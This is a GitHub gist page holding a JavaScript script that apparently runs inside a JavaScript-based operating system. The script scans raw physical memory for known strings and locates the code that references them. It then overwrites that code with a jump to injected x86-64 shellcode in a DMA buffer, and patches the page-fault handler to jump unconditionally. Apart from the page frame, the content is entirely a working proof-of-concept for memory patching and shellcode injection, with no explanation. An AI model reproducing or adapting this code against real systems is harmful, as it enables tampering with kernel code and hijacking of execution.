Skip to content

Instantly share code, notes, and snippets.

@McSimp
Created September 24, 2017 16:25
Show Gist options
  • Save McSimp/d7a082de0e02afea51e35230e53cdb3b to your computer and use it in GitHub Desktop.
Save McSimp/d7a082de0e02afea51e35230e53cdb3b to your computer and use it in GitHub Desktop.
console.log("Starting");
function findData(lookFor) {
var MEM_START_OFFSET = 1;
var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(MEM_START_OFFSET, 0x7FFFFFFF).buffer());
var locs = [];
for (var i = 0; i < 0x2000000; i++) {
var found = true;
for (var j = 0; j < lookFor.length; j++) {
if (memBuffer[i+j] != lookFor[j]) {
found = false;
break;
}
}
if (found) {
return (i + MEM_START_OFFSET);
}
}
return null;
}
function decToHex(d) {
var hex = d.toString(16);
hex = "00".substr(0, 2 - hex.length) + hex;
return hex;
}
function dumpMem(start, size) {
var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(start, size).buffer());
var outStr = "";
for (var i = 0; i < size; i++) {
outStr += decToHex(memBuffer[i]);
}
return outStr;
}
function writeData(writeTo, data) {
var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(writeTo, data.length).buffer());
for (var i = 0; i < data.length; i++) {
memBuffer[i] = data[i];
}
}
function writeMultipleData(writeTo, datas) {
var offset = 0;
for (var i = 0; i < datas.length; i++) {
writeData(writeTo + offset, datas[i]);
offset += datas[i].length;
}
}
function pointerToBytes(pointer) {
var result = [];
for (var i = 0; i < 4; i++) {
result.push((pointer >> (i*8)) & 0xFF);
}
return result;
}
var dbgStrAddr = findData(" --- DEBUG --- ".split('').map((char) => char.charCodeAt(0)));
console.log("Found debug string at: ", dbgStrAddr.toString(16));
var dbgStrUsageAddr = findData(pointerToBytes(dbgStrAddr));
console.log("Found debug string usage at: ", dbgStrUsageAddr.toString(16));
var codeBuf = __SYSCALL.allocDMA();
console.log("Allocated buffer for shellcode at: ", codeBuf.address.toString(16));
/*
0: 48 c7 c3 00 00 e0 1c mov rbx,0x1ce00000
7: ff e3 jmp rbx
*/
var jmpData = [
[0x48, 0xc7, 0xc3], pointerToBytes(codeBuf.address),
[0xff, 0xe3]
];
writeMultipleData(dbgStrUsageAddr - 5, jmpData);
/*
0: 48 83 c4 08 add rsp,0x8
4: 48 bf ef ee be ad de movabs rdi,0xdeadbeeeef
b: 00 00 00
e: 48 c7 c3 78 56 34 12 mov rbx,0x12345678
15: ff e3 jmp rbx
*/
var shellcode = [
[0x48, 0x83, 0xc4, 0x08],
[0x48, 0xbf, 0xef, 0xee, 0xbe, 0xad, 0xde, 0x00, 0x00, 0x00],
[0x48, 0xc7, 0xc3], pointerToBytes(dbgStrUsageAddr + 4),
[0xff, 0xe3]
];
writeMultipleData(codeBuf.address, shellcode);
var invalidStrAddr = findData("Invalid Faulting address = %p".split('').map((char) => char.charCodeAt(0)));
console.log("Found page fault string at: ", invalidStrAddr.toString(16));
var invalidStrUsageAddr = findData(pointerToBytes(invalidStrAddr));
console.log("Found page fault string usage at: ", invalidStrUsageAddr.toString(16));
// Set unconditional jump in page fault handler
writeData(invalidStrUsageAddr - 251, [0xEB]);
console.log("Finished writing shellcode");
__SYSCALL.debug();
console.log("Finished calling debug");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment